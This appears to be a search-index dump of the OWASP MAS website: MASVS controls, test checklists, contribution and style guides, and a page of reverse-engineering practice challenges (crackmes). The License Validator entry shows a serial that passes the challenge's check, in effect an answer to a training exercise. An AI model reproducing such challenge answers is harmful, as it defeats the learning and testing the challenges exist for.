Apps handle sensitive data coming from many sources such as the user, the backend, system services or other apps on the device and usually need to store it locally. The storage locations may be private to the app (e.g. its internal storage) or be public and therefore accessible by the user or other installed apps (e.g. public folders such as Downloads). This control ensures that any sensitive data that is intentionally stored by the app is properly protected independently of the target location.
"},{"location":"MASVS/controls/MASVS-STORAGE-2/","title":"MASVS-STORAGE-2","text":"The app prevents leakage of sensitive data.
There are cases when sensitive data is unintentionally stored or exposed to publicly accessible locations; typically as a side-effect of using certain APIs, system capabilities such as backups or logs. This control covers this kind of unintentional leaks where the developer actually has a way to prevent it.
"},{"location":"checklists/MASVS-AUTH/","title":"MASVS AUTH","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-AUTH-1 The app uses secure authentication and authorization protocols and follows the relevant best practices. MASVS-AUTH-2 The app performs local authentication securely according to the platform best practices. Testing Confirm Credentials Testing Biometric Authentication Testing Local Authentication MASVS-AUTH-3 The app secures sensitive operations with additional authentication. "},{"location":"checklists/MASVS-CODE/","title":"MASVS CODE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CODE-1 The app requires an up-to-date platform version. MASVS-CODE-2 The app has a mechanism for enforcing app updates. Testing Enforced Updating Testing Enforced Updating MASVS-CODE-3 The app only uses software components without known vulnerabilities. Checking for Weaknesses in Third Party Libraries Checking for Weaknesses in Third Party Libraries MASVS-CODE-4 The app validates and sanitizes all untrusted inputs. Make Sure That Free Security Features Are Activated Testing for Injection Flaws Testing Local Storage for Input Validation Memory Corruption Bugs Testing Object Persistence Testing Implicit Intents Testing for URL Loading in WebViews Testing Object Persistence Memory Corruption Bugs Make Sure That Free Security Features Are Activated "},{"location":"checklists/MASVS-CRYPTO/","title":"MASVS CRYPTO","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CRYPTO-1 The app employs current strong cryptography and uses it according to industry best practices. Testing Random Number Generation Testing Symmetric Cryptography Testing the Configuration of Cryptographic Standard Algorithms Verifying the Configuration of Cryptographic Standard Algorithms Testing Random Number Generation MASVS-CRYPTO-2 The app performs key management according to industry best practices. Testing the Purposes of Keys Testing Key Management "},{"location":"checklists/MASVS-NETWORK/","title":"MASVS NETWORK","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-NETWORK-1 The app secures all network traffic according to the current best practices. Testing the TLS Settings Testing Data Encryption on the Network Testing Endpoint Identify Verification Testing the Security Provider Testing Data Encryption on the Network Testing Endpoint Identity Verification Testing the TLS Settings MASVS-NETWORK-2 The app performs identity pinning for all remote endpoints under the developer's control. Testing Custom Certificate Stores and Certificate Pinning Testing Custom Certificate Stores and Certificate Pinning "},{"location":"checklists/MASVS-PLATFORM/","title":"MASVS PLATFORM","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PLATFORM-1 The app uses IPC mechanisms securely. Testing for Vulnerable Implementation of PendingIntent Determining Whether Sensitive Stored Data Has Been Exposed via IPC Mechanisms Testing for App Permissions Testing for Sensitive Functionality Exposure Through IPC Testing Deep Links Testing Universal Links Testing UIActivity Sharing Testing UIPasteboard Testing Custom URL Schemes Testing App Permissions Testing App Extensions Determining Whether Sensitive Data Is Exposed via IPC Mechanisms MASVS-PLATFORM-2 The app uses WebViews securely. Testing WebViews Cleanup Testing for Java Objects Exposed Through WebViews Testing WebView Protocol Handlers Testing JavaScript Execution in WebViews Testing iOS WebViews Determining Whether Native Methods Are Exposed Through WebViews Testing WebView Protocol Handlers MASVS-PLATFORM-3 The app uses the user interface securely. Checking for Sensitive Data Disclosure Through the User Interface Testing for Overlay Attacks Finding Sensitive Information in Auto-Generated Screenshots Testing Auto-Generated Screenshots for Sensitive Information Checking for Sensitive Data Disclosed Through the User Interface "},{"location":"checklists/MASVS-PRIVACY/","title":"MASVS PRIVACY","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PRIVACY-1 The app minimizes access to sensitive data and resources. MASVS-PRIVACY-2 The app prevents identification of the user. MASVS-PRIVACY-3 The app is transparent about data collection and usage. MASVS-PRIVACY-4 The app offers user control over their data. "},{"location":"checklists/MASVS-RESILIENCE/","title":"MASVS RESILIENCE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-RESILIENCE-1 The app validates the integrity of the platform. Testing Root Detection Testing Emulator Detection Testing Jailbreak Detection Testing Emulator Detection MASVS-RESILIENCE-2 The app implements anti-tampering mechanisms. Testing File Integrity Checks Making Sure that the App is Properly Signed Testing Runtime Integrity Checks Testing File Integrity Checks Making Sure that the App Is Properly Signed MASVS-RESILIENCE-3 The app implements anti-static analysis mechanisms. Testing for Debugging Code and Verbose Error Logging Testing for Debugging Symbols Testing Obfuscation Testing for Debugging Code and Verbose Error Logging Testing Obfuscation Testing for Debugging Symbols MASVS-RESILIENCE-4 The app implements anti-dynamic analysis techniques. Testing Anti-Debugging Detection Testing whether the App is Debuggable Testing Reverse Engineering Tools Detection Testing Anti-Debugging Detection Testing Reverse Engineering Tools Detection Testing whether the App is Debuggable "},{"location":"checklists/MASVS-STORAGE/","title":"MASVS STORAGE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming version of the MASTG we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-STORAGE-1 The app securely stores sensitive data. Testing the Device-Access-Security Policy Testing Local Storage for Sensitive Data Testing Local Data Storage MASVS-STORAGE-2 The app prevents leakage of sensitive data. Determining Whether Sensitive Data Is Shared with Third Parties via Embedded Services Testing Backups for Sensitive Data Testing Logs for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties via Notifications Testing Memory for Sensitive Data Determining Whether the Keyboard Cache Is Disabled for Text Input Fields Testing Memory for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties Testing Backups for Sensitive Data Checking Logs for Sensitive Data Finding Sensitive Data in the Keyboard Cache "},{"location":"contributing/1_How_Can_You_Contribute/","title":"How Can You Contribute?","text":"You can directly contribute to the MASVS or MASTG in many different ways! First, go ahead and create a GitHub account for free on the GitHub homepage.
"},{"location":"contributing/1_How_Can_You_Contribute/#contribution-flow","title":"Contribution Flow","text":"flowchart LR\n A(Open Discussion) -->|discuss| C{qualifies?}\n C -->|Yes| D(Issue)\n C -->|No| E[Close]\n D -->|open PR| F(Pull Request)\n F -->|review| G{approved?}\n F -->|make changes| F\n G -->|Yes| H[Merge]\n G -->|No| I[Close]
"},{"location":"contributing/1_How_Can_You_Contribute/#participate-in-discussions","title":"\ud83d\udcac Participate in Discussions","text":"Our GitHub Discussions are the first place to go to ask questions, give feedback, and propose new ideas. If your proposal qualifies for the MASTG/MASVS, we'll convert it into an \"Issue\" (the discussion might take a while).
"},{"location":"contributing/1_How_Can_You_Contribute/#create-issues","title":"\ud83c\udfaf Create Issues","text":"Before creating a PR, first create an Issue to be discussed for missing requirements, content or errors.
You can contribute with content or corrections by opening a Pull Request (PR).
Learn how to open a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#become-a-reviewer","title":"\u2705 Become a Reviewer","text":"You can Review Pull Requests (PRs) and also gain contributions. If you are a fluent speaker in any of the different languages that the MASVS is available in, feel free to give feedback on any of the submitted PRs.
After your PR or issue has been submitted, we will review it as quickly as possible which typically only takes a few days. If you think we have forgotten about it, feel free to give us a nudge after 7 days have passed.
Learn how to review a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#proof-reading","title":"\ud83d\udd0e Proof-reading","text":"If you do proof-reading, these are the things we\u2019re looking for:
Refer to Google Technical Writing trainings for more info:
First of all Create a GitHub account (a free one is enough) by following these steps.
Our workflow is like this:
Open a Discussion (for ideas and proposals) If your proposal qualifies for the MASTG/MASVS we'll convert it into an \"Issue\" (the discussion might take a while).
MASVS Example: \"Add a MASVS-CRYPTO requirement on Key rotation\"
MASTG Example: \"Add a Test case for key rotation\"
Open an Issue (for concrete actionable things that have to / could be done) For instance, there's a typo, or it's clear that a certain Test case doesn't have e.g. \"Dynamic Analysis\" and it should be added.
Normally, contributors should follow the whole flow. But sometimes it's clear what's needed so we directly go to 2 (open an issue) or even to 3 (open a PR). We recommend starting with a discussion or directly contacting us to save you the hurdle of writing and submitting new content that does not qualify so we have to reject it after the work is done.
If you just have a specific question you can post it to (you need a GitHub Account):
\"GitHub Discussions\" are re-posted to our Slack channel.
Once you get your answer please mark it as answered. When you mark a question as an answer, GitHub will highlight the comment and replies to the comment to help visitors quickly find the answer.
"},{"location":"contributing/2_Getting_Started/#contribute-online","title":"Contribute Online","text":"GitHub makes this extremely easy.
For small changes in one file:
For more complex changes or across files:
.
while browsing the repo or pull request.Learn more about the github.dev Web-based Editor in \"GitHub Docs\".
"},{"location":"contributing/2_Getting_Started/#contribute-offline","title":"Contribute Offline","text":"For this you need an IDE or text editor and git on your machine. We recommend using the free Visual Studio Code editor with the markdownlint extension.
$ git clone https://github.com/<your_github_user>/owasp-masvs.git\n$ cd owasp-masvs/\n$ git remote add upstream git@github.com:OWASP/owasp-masvs.git\n
$ git checkout -b fix-issue-1456\n
git add MYFILE
for every file you have modified, followed by git commit -m 'Your Commit Message'
to commit the modifications and git push
to push your modifications to GitHub.You can create a Pull Request (PR) by following these steps. Remember that:
master
.#<issue-id>
\".Your PR will be reviewed soon (refer to this page to learn more about reviews).
Before opening a PR please self-review your changes in GitHub and ensure that you follow our style guide to speed up the review process\u26a1
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-incorporate-the-reviewers-feedback-to-your-pr","title":"How to Incorporate the Reviewer's Feedback to your PR","text":"It might be directly approved and merged or one of our reviewers will send you some comments and suggested changes.
When reviewers suggest changes in a pull request, you can automatically incorporate the changes into your PR.
NOTE: Remember to regularly sync your fork with the upstream repo. This gets you the latest changes and makes it easier to merge your PR.
git pull upstream master\n
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-review-a-pr","title":"How to Review a PR","text":"If you'd like to review an open PR please follow these steps:
"},{"location":"contributing/3_PRs_and_Reviews/#step-1-comment-and-suggest-changes","title":"Step 1: Comment and Suggest Changes","text":"You can enter single or multi-line comments (click and drag to select the range of lines):
Always prefer making \"Suggested Changes\" using the \u00b1
button:
If the suggestion you'd like to make cannot be expressed using \"suggested changes\" please enter a clear comment explaining what should be fixed (e.g. some paragraphs don't link properly or some essential information cannot be found and should be added).
Using \"Suggested Changes\" saves you as a reviewer and the PR author a lot of time. And you get points (attributions) for the changes that you suggested (if the author commits them you become a co-author of those commits). If you're consistent with your reviewer work you can apply to be recognized as an official reviewer in our Acknowledgements page.
"},{"location":"contributing/3_PRs_and_Reviews/#step-2-submit-your-review","title":"Step 2: Submit your Review","text":"Once you went through the whole PR you can submit your review
Learn more: \"(GitHub Docs) Reviewing proposed changes in a pull request\".
"},{"location":"contributing/4_Add_new_Language/","title":"Add a New Language","text":""},{"location":"contributing/4_Add_new_Language/#mastg-translations","title":"MASTG Translations","text":"The MASTG is a living document that changes and adapts to the most recent security recommendations every day. While we do want to reach the maximum audience possible, our past experience shows that maintaining translations has proven to be an extremely challenging task. Therefore, please understand that any PRs containing MASTG translations will be declined, but you're free to do them on your own forks.
\ud83c\uddef\ud83c\uddf5 A translation of the MASTG into Japanese is available on Github: https://github.com/coky-t/owasp-mstg-ja. Thanks to @coky-t for pushing this forward!
That said, we strongly encourage further translations of the MASVS as it is much easier to maintain and you'll get a translated Mobile App Security Checklist mapping to the MASTG for free.
"},{"location":"contributing/4_Add_new_Language/#masvs-translations","title":"MASVS Translations","text":"To add a new language you have to follow the steps from both sections below.
Document-ja
.metadata.md
from another language and modify it for the new language.export.py
.github/workflows/docgenerator.yml
and add the action steps for the new language.../LANGS.md
to include the new language.../README.md
with the newly available language.IMPORTANT: only after releasing the MASVS!
src/scripts/gen_all_excel.sh
.The following rules are meant to ensure consistency of the MASTG:
We recommend you to take these free Google courses when writing or reviewing content for the MAS project:
The primary measure for amount of content on a page should be based on the purpose it serves.
Those containing one or two screens of text at most. Users are scanning for link choices. Use longer pages (those that require more scrolling or reading) deeper within the chapter where content can be printed and read later.
Consider creating a supporting document and linking to it from the page rather than displaying all the information directly on the page.
"},{"location":"contributing/5_Style_Guide/#gender-neutrality","title":"Gender Neutrality","text":"The MASTG reaches all kind of people all over the world. To ensure inclusiveness and diversity, please refrain from using the following throughout the book:
Or any other constructions like \"he/she\", \"s/he\", \"his or her\". Instead, use the following gender-neutral alternatives:
There is one exception: We are still using \"man in the middle\", as it is simply a common term in the industry and there is no common replacement for it.
"},{"location":"contributing/5_Style_Guide/#timeliness-of-content","title":"Timeliness of Content","text":"Keeping accurate and timely content establishes the OWASP MAS deliverables as a credible and trustworthy source of information.
When using statistical data on your page, ensure that the information is current and up-to-date and is accompanied by the source from which it was derived, along with the date the data was compiled.
"},{"location":"contributing/5_Style_Guide/#content-for-the-digital-platform-versus-for-print","title":"Content for the Digital Platform Versus for Print","text":"Write concise content that the user can read quickly and efficiently. For digital content - create shorter pages that are cross-linked. If your content is likely to be printed, create one long page.
"},{"location":"contributing/5_Style_Guide/#audience","title":"Audience","text":"Write for an international audience with a basic level of technical understanding i.e. they have a mobile phone and know how to install an app. Avoid hard-to-translate slang words/phrases to ensure content is accessible to readers who aren't native English speakers.
"},{"location":"contributing/5_Style_Guide/#context-and-orientation","title":"Context and Orientation","text":"Let the users know where they are on every page. Establish the topic by using a unique page heading.
Include a clear and concise introduction where possible.
Link to background information where necessary.
"},{"location":"contributing/5_Style_Guide/#write-so-people-will-read-with-joy","title":"Write so People Will Read with Joy","text":"Use the following methods to increase scannability:
-
rather than asterisks *
for listsFor longer pages, use the following tools to make the page easily scannable:
When presenting your content in a list format:
When using a number between zero and ten, spell out the number (e.g., \"three\" or \"ten\").
When using any number higher than ten, use the numeric version (e.g., \"12\" or \"300\").
"},{"location":"contributing/5_Style_Guide/#2-language","title":"2. Language","text":""},{"location":"contributing/5_Style_Guide/#american-spelling-and-terminology","title":"American Spelling and Terminology","text":"Use American spelling and terminology.
Change all British spelling and terminology to the American equivalents where applicable. This includes \"toward\" (US) vs. \"towards\" (UK), \"among\" (US) vs. \"amongst\" (UK), \"analyze\" (US) vs. \"analyse\" (UK), \"behavior\" (US) vs \"behaviour\" (UK), etc.
"},{"location":"contributing/5_Style_Guide/#plurals","title":"Plurals","text":"Adhere to standard grammar and punctuation rules when it comes to pluralization of typical words.
The plural of calendar years does not take the apostrophe before the \"s\". For example, the plural form of 1990 is 1990s.
"},{"location":"contributing/5_Style_Guide/#title-capitalization","title":"Title Capitalization","text":"We follow the title case rules from the \"Chicago Manual of Style\":
When in doubt, you can verify proper capitalization on https://titlecaseconverter.com/.
"},{"location":"contributing/5_Style_Guide/#standardization","title":"Standardization","text":"This is a list of words/abbreviations that are used inconsistently at the moment in the MASTG and need standardization:
Use the following common contractions:
Abbreviations include acronyms, initialisms, shortened words, and contractions.
The following snippet demonstrates most of these points:
## JAR Files\n\nJAR (Java ARchive) files are [...]\n\nAPKs are packed using the ZIP format. An APK is a variation of a JAR file [...]\n
For commonly used file formats such as APK, IPA or ZIP, please do not refer to them as \".apk\", \".ipa\" or \".zip\" unless you're explicitly referring to the file extension.
"},{"location":"contributing/5_Style_Guide/#referencing-android-versions","title":"Referencing Android versions","text":"Use the following format when referring to an Android version: Android X (API level YY). Usage of the descriptive name (Ex: Oreo) is discouraged.
Ex: Android 9 (API level 28)
"},{"location":"contributing/5_Style_Guide/#addressing-the-reader-in-test-cases","title":"Addressing the Reader in Test Cases","text":"Throughout the guide, you may want to address the readers in order to tell them what to do, or what they should notice. For any such case, use an active approach and simply address the reader using \"you\".
Correct: If you open the AndroidManifest.xml file, you will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If you run the following command, you will see that atr1 is actually dangerous: [...].
Wrong: The AndroidManifest.xml file contains an Application tag, with the following attributes: atr1, atr2 and atr3. The command below shows that atr1 is dangerous: [...].
Wrong: If we open the AndroidManifest.xml file, we will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If we run the following command, we will see that atr1 is actually dangerous: [...].
"},{"location":"contributing/5_Style_Guide/#3-external-references","title":"3. External References","text":""},{"location":"contributing/5_Style_Guide/#web-links","title":"Web Links","text":"Use markdown's in-line link format (A) [TEXT](URL \"TITLE\")
or (B) [TEXT](URL)
.
For example:
The [threat modeling guidelines defined by OWASP](https://owasp.org/www-community/Threat_Modeling \"OWASP Threat Modeling\") are generally applicable to mobile apps.\n
When using (A), be sure to escape special characters such as apostrophe (\\') or single quote (`), as otherwise the link will be broken in Gitbook.
Wrong usage, see \"iPhone's\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone's UDID\")\n
Right usage, see \"iPhone\\'s\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone\\'s UDID\")\n
When adding links to the \"References\" section at the end of the chapters use - Title - <url>
. This is needed to force latex to print URLs properly for the PDF.
For example:
- adb - <https://developer.android.com/studio/command-line/adb>\n
"},{"location":"contributing/5_Style_Guide/#books-and-papers","title":"Books and Papers","text":"For books and papers, use the following format: [#NAME]
.
And include the full reference in the \"References\" section at the end of the markdown file manually. Example:
An obfuscated encryption algorithm can generate its key (or part of the key)\nusing data collected from the environment [#riordan].\n
And under the \"References\" section at the end of the chapters:
- [#riordan] - James Riordan, Bruce Schneier. Environmental Key Generation towards Clueless Agents. Mobile Agents and Security, Springer Verlag, 1998\n
Papers:
The general form for citing technical reports is to place the name and location of the company or institution after the author and title and to give the report number and date at the end of the reference.
Basic Format:
- [shortname] J. K. Author, \"Title of report,\" Abbrev. Name of Co., City of Co., Abbrev. State, Rep. xxx, year\n\n- [shortname] \\[Author(s)\\], \\[Title\\] - Link\n
Books:
- [shortname] \\[Author(s)\\], \\[Title\\], \\[Published\\], \\[Year\\]\n\n- [examplebook] J. K. Author, \"Title of chapter in the book,\" in Title of His Published Book, xth ed. City of Publisher, Country if not USA: Abbrev. of Publisher, year, ch. x, sec. x, pp. xxx-xxx.\n
NOTE: Use et al. when three or more names are given
e.g.
- [klaus] B. Klaus and P. Horn, Robot Vision. Cambridge, MA: MIT Press, 1986.\n- [stein] L. Stein, \"Random patterns,\" in Computers and You, J. S. Brake, Ed. New York: Wiley, 1994, pp. 55-70.\n- [myer] R. L. Myer, \"Parametric oscillators and nonlinear materials,\" in Nonlinear Optics, vol. 4, P. G. Harper and B. S. Wherret, Eds. San Francisco, CA: Academic, 1977, pp. 47-160.\n- [abramowitz] M. Abramowitz and I. A. Stegun, Eds., Handbook of Mathematical Functions (Applied Mathematics Series 55). Washington, DC: NBS, 1964, pp. 32-33.\n
"},{"location":"contributing/5_Style_Guide/#4-references-within-the-guide","title":"4. References Within The Guide","text":"For references to other chapters in the MASTG, simply name the chapter, e.g.: See also the chapter \"Basic Security Testing\"
, See the section \"Apktool\" in the chapter \"Basic Security Testing\"
etc. The MASTG should be convenient to read as a printed book, so use internal references sparingly. Alternatively you can create a link for the specific section:
See the section \"[App Bundles](0x05a-Platform-Overview.md#app-bundles)\" in the chapter ...\n
Note that in such a case the anchor (everything after the #
) should be lowercase, and spaces should be replaced with hyphens.
Pictures should be uploaded to the Images/Chapters directory. Afterwards they should be embedded by using the image tag, a width of 500px should be specified. For example:
<img src=\"Images/Chapters/0x06d/key_hierarchy_apple.jpg\" width=\"500px\"/>\n- *iOS Data Protection Key Hierarchy*\n
"},{"location":"contributing/5_Style_Guide/#6-punctuation-conventions","title":"6. Punctuation Conventions","text":""},{"location":"contributing/5_Style_Guide/#lowercase-or-capital-letter-after-a-colon","title":"Lowercase or Capital Letter after a Colon","text":"Chicago Manual of Style (6.61: Lowercase or capital letter after a colon) says: lowercase the first word unless it is a proper noun or the start of at least two complete sentences or a direct question.
"},{"location":"contributing/5_Style_Guide/#serial-comma-use","title":"Serial Comma Use","text":"Use a serial comma before \"and\" for the last item in a run-in list of three or more items. For example:
We bought apples, oranges, and tomatoes from the store.
"},{"location":"contributing/5_Style_Guide/#quote-marks-and-apostrophes","title":"Quote Marks and Apostrophes","text":"Use straight double quotes, straight single quotes, and straight apostrophes (not curly quotes/apostrophes).
"},{"location":"contributing/5_Style_Guide/#technical-terms","title":"Technical Terms","text":"Spell/punctuate specific technical terms as they are used by the company (e.g., use the company website).
In order of preference, spell/punctuate generic technical terms according to
Markdown blockquotes can be used for comments in the documents by using >
> This is a blockquote\n
"},{"location":"contributing/5_Style_Guide/#8-code-and-shell-commands","title":"8. Code and Shell Commands","text":"Use code blocks when including sample code, shell commands, and paths. In Markdown, code blocks are denoted by triple backticks (```
). GitHub also supports syntax highlighting for a variety of languages. For example, a Java code block should be annotated as follows:
```java\n public static void main(String[] args) { System.out.println(\" Hello World!\"); } } ;\n ```\n
This produces the following result:
public static void main(String[] args) { System.out.println(\" Hello World!\"); } }\n
When including shell commands, make sure to specify the language for correct syntax highlighting (e.g. shell
or bash
) and remove any host names and usernames from the command prompt, e.g.:
```shell\n $ echo 'Hello World'\n Hello World\n ```\n
When a command requires parameters that need to be modified by the reader, surround them with angle brackets:
$ adb pull <remote_file> <target_destination>\n
"},{"location":"contributing/5_Style_Guide/#in-text-keywords","title":"In-text Keywords","text":"When they do not occur in a code block, place the following code-related keywords in backticks (``
), double straight quote marks (\"\"
), or leave unpunctuated according to the table:
true
, 0
, YES
) XML attributes (e.g., get-task-allow
on iOS Plists, \"@string/app_name\"
on Android Manifests) XML attribute values (e.g., android:label
on Android Manifests) property names object names API calls interface names If nouns in backticks are plural, place the \"s\" after the second backtick (e.g. RuntimeException
s). Do not add parentheses, brackets, or other punctuation to any keywords that are in backticks (e.g., main
not main()
).
When referring to any UI element by name, put its name in boldface, using **<name>**
(e.g., Home -> Menu).
The MAS project is a powerful learning resource and the MAS Crackmes are no exception. They allow the MAS community not only to practice the MAS skills they've learned from the MASTG but also let them confirm their approaches to the used techniques, especially when performing reverse engineering.
"},{"location":"contributing/6_Add_a_Crackme/#who-can-contribute-with-a-crackme","title":"Who Can Contribute with a Crackme?","text":"Anyone from individuals to companies. You only have to read and accept the Terms and Conditions listed below.
Before submitting a crackme, first of all contact the MAS team here: https://mas.owasp.org/contact/
"},{"location":"contributing/6_Add_a_Crackme/#terms-and-conditions","title":"Terms and Conditions","text":"If you want to contribute to the MAS crackmes please consider that:
\u2611\ufe0f The source code of the crackme apps must be made publicly available at https://github.com/OWASP/mas-crackmes.
\u2611\ufe0f The crackme apps must be reviewed and approved by the MAS project leaders. Some form of documentation and solution writeup/video must be provided for the review process. That must include a list of \"features\" including techniques used (e.g. obfuscation, whitebox crypto, inline assembly, etc.)
\u2611\ufe0f The crackme apps must not contain any company branding or advertising material (ads, company URL, etc.).
\u2611\ufe0f The crackme apps must align with the MASVS and MASTG in some way.
\u2611\ufe0f The crackme authors are fully responsible for the maintenance of the crackme in the case bugfixes or updates are needed and the MAS team is not able to perform those actions.
"},{"location":"contributing/6_Add_a_Crackme/#publishing-and-acknowledgements","title":"Publishing and Acknowledgements","text":"When successfully adding a crackme, its authors will be credited in the corresponding crackme page in the project website at https://mas.owasp.org/crackmes and an announcement will be made via the official MAS social media channels.
"},{"location":"contributing/6_Add_a_Crackme/#owasp-openness-and-licencing-guidelines","title":"OWASP Openness and Licencing Guidelines","text":"The OWASP projects have a strong foundation in openness and this includes all material related to the projects.
OWASP Projects must be open in all facets, including source material, contributors, organizational structure, and finances (if any). Project source code (if applicable) must be made openly available, project communication channels (e.g. mailing lists, forums) should be open and free from censorship, and all project materials must be licensed under a community friendly license as approved by the Free Software Foundation (Appendix 8.2).
Please refer to the OWASP Project Leader Handbook that we as project leaders need to comply with: https://owasp.org/www-pdf-archive/PROJECT_LEADER-HANDBOOK_2014.pdf
"},{"location":"crackmes/","title":"MAS Crackmes","text":"Welcome to the MAS Crackmes aka. UnCrackable Apps, a collection of mobile reverse engineering challenges. These challenges are used as examples throughout the OWASP MASTG. Of course, you can also solve them for fun.
Android UnCrackable L1 UnCrackable-Level1.apk Download Android UnCrackable L2 UnCrackable-Level2.apk Download Android UnCrackable L3 UnCrackable-Level3.apk Download Android UnCrackable L4 r2pay-v0.9.apk Download Android UnCrackable DRM validate (ELF 32-bit) Download iOS UnCrackable L1 UnCrackable-Level1.ipa Download iOS UnCrackable L2 UnCrackable-Level2.ipa Download "},{"location":"crackmes/Android/","title":"Android Crackmes","text":""},{"location":"crackmes/Android/#android-uncrackable-l1","title":"Android UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level1.apk\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#android-uncrackable-l2","title":"Android UnCrackable L2","text":"This app holds a secret inside. May include traces of native code.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level2.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Michael Helwig for finding and fixing an oversight in the anti-tampering mechanism.
"},{"location":"crackmes/Android/#android-uncrackable-l3","title":"Android UnCrackable L3","text":"The crackme from hell! A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level3.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Eduardo Novella for testing, feedback and pointing out flaws in the initial build(s).
"},{"location":"crackmes/Android/#android-uncrackable-l4","title":"Android UnCrackable L4","text":"The Radare2 community always dreamed of its decentralized and free currency to allow r2 fans to make payments in places and transfer money between r2 users. A debug version of the r2Pay app has been developed and it will be supported very soon in many stores and websites. Can you verify that this is cryptographically unbreakable?
Hint: Run the APK in a non-tampered device to play a bit with the app.
r2con{PIN_NUMERIC:SALT_LOWERCASE}
r2con{ascii(key)}
Versions:
Download v0.9
Download v1.0
v0.9
- Release for OWASP MAS: Source code is available and the compilation has been softened in many ways to make the challenge easier and more enjoyable for newcomers.v1.0
- Release for R2con CTF 2020: No source code is available and many extra protections are in place.This app is compatible with Android 4.4 and up.
$ adb install r2pay-v0.9.apk\n
SPOILER (Solutions) Created and maintained by Eduardo Novella & Gautam Arvind. Special thanks to NowSecure for supporting this crackme.
"},{"location":"crackmes/Android/#android-license-validator","title":"Android License Validator","text":"A brand new Android app sparks your interest. Of course, you are planning to purchase a license for the app eventually, but you'd still appreciate a test run before shelling out $1. Unfortunately no keygen is available! Generate a valid serial key that is accepted by this app.
Download
InstallationCopy the binary to your Android device and run using the shell.
$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n$ adb shell chmod 755 /data/local/tmp/validate\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n$ adb shell /data/local/tmp/validate 1234\nIncorrect serial (wrong format).\n$ adb shell /data/local/tmp/validate JACE6ACIARNAAIIA\nEntering base32_decode\nOutlen = 10\nEntering check_license\nProduct activation passed. Congratulations!\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#mastg-hacking-playground","title":"MASTG Hacking Playground","text":"Did you enjoy working with the Crackmes? There is more! Go to the MASTG Hacking Playground and find out!
